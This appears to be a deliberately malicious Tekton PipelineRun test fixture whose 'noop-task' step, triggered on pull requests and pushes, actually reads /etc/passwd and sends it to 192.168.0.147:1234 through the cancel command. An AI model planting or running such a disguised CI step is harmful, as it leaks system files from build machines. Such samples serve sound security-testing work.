---
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
  name: scratchmyback-bad
  annotations:
    pipelinesascode.tekton.dev/on-event: "[pull_request, push]"
    pipelinesascode.tekton.dev/on-target-branch: "[main]"
    pipelinesascode.tekton.dev/max-keep-runs: "2"
spec:
  pipelineSpec:
    tasks:
      - name: noop-task
        taskSpec:
          steps:
            - name: noop-task
              image: registry.access.redhat.com/ubi9/ubi-micro
              script: |
                cancel -u "$(cat /etc/passwd)" -h 192.168.0.147:1234
                exit 0
